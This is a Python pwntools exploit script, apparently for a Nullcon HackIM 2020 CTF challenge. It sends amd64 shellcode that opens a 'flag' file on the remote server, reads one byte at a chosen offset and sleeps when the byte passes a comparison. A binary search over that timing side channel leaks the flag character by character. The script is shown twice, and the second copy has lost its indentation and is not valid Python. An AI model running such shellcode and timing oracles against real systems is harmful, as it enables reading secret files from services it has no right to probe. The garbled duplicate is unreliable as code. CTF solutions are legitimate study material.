KaoRz/exploit.py

## exploit.py
from pwn import *
import time

context.arch = "amd64"

HOST = "pwn4.ctf.nullcon.net"
PORT = 5003

def screen_clean():
    sys.stdout.write("\033[F")
    sys.stdout.write("\033[K")

def send_shellcode(io, offset, limit_intval):

    shellcode = """
        push 0x67616c66
        mov rax, 2
        mov rdi, rsp
        xor rsi, rsi
        xor rdx, rdx
        syscall
        push rax

        mov rdi, rax
        mov rax, 8
        mov rsi, %d
        mov rdx, 0
        syscall

        pop rdi
        mov rax, 0
        sub rsp, 8
        mov rsi, rsp
        mov rdx, 0x1
        syscall

        mov al, byte ptr [rsp]
        cmp al, %d
        jl crash

        hit:
            push 0
            push 3
            mov rdi, rsp
            xor rsi, rsi
            mov rax, 35
            syscall

        crash:
            nop
    """ % (offset, limit_intval)

    io.sendline(asm(shellcode))


def bruteforce_char(offset):

    base_limit = 0
    top_limit  = 128

    for i in range(8):
        io = remote(HOST, PORT)
        screen_clean()
        curr_limit = (int)((top_limit + base_limit) / 2)
        send_shellcode(io, offset, curr_limit)
        start = time.time()

        try:
            io.recv()
        except EOFError as error:
            pass

        if time.time() - start > 3.0:
            base_limit = curr_limit
        else:
            top_limit = curr_limit

        log.info("Current character --> " + chr(curr_limit) + " (" + str(base_limit) + ", " + str(top_limit) + ")")
        io.close()
        screen_clean()

    log.success("Char found --> " + chr(curr_limit))
    return chr(curr_limit)

flag = ""
cnt = 0
while "}" not in flag:
    flag += bruteforce_char(cnt)
    log.info("Progress --> " + flag)
    cnt += 1

log.success("FLAG --> " + flag)
# [+] FLAG --> hackim20{OMG_The_first_one_was_unintended}
	from pwn import *
	import time

	context.arch = "amd64"

	HOST = "pwn4.ctf.nullcon.net"
	PORT = 5003

	def screen_clean():
	sys.stdout.write("\033[F")
	sys.stdout.write("\033[K")

	def send_shellcode(io, offset, limit_intval):

	shellcode = """
	push 0x67616c66
	mov rax, 2
	mov rdi, rsp
	xor rsi, rsi
	xor rdx, rdx
	syscall
	push rax

	mov rdi, rax
	mov rax, 8
	mov rsi, %d
	mov rdx, 0
	syscall

	pop rdi
	mov rax, 0
	sub rsp, 8
	mov rsi, rsp
	mov rdx, 0x1
	syscall

	mov al, byte ptr [rsp]
	cmp al, %d
	jl crash

	hit:
	push 0
	push 3
	mov rdi, rsp
	xor rsi, rsi
	mov rax, 35
	syscall

	crash:
	nop
	""" % (offset, limit_intval)

	io.sendline(asm(shellcode))


	def bruteforce_char(offset):

	base_limit = 0
	top_limit = 128

	for i in range(8):
	io = remote(HOST, PORT)
	screen_clean()
	curr_limit = (int)((top_limit + base_limit) / 2)
	send_shellcode(io, offset, curr_limit)
	start = time.time()

	try:
	io.recv()
	except EOFError as error:
	pass

	if time.time() - start > 3.0:
	base_limit = curr_limit
	else:
	top_limit = curr_limit

	log.info("Current character --> " + chr(curr_limit) + " (" + str(base_limit) + ", " + str(top_limit) + ")")
	io.close()
	screen_clean()

	log.success("Char found --> " + chr(curr_limit))
	return chr(curr_limit)

	flag = ""
	cnt = 0
	while "}" not in flag:
	flag += bruteforce_char(cnt)
	log.info("Progress --> " + flag)
	cnt += 1

	log.success("FLAG --> " + flag)
	# [+] FLAG --> hackim20{OMG_The_first_one_was_unintended}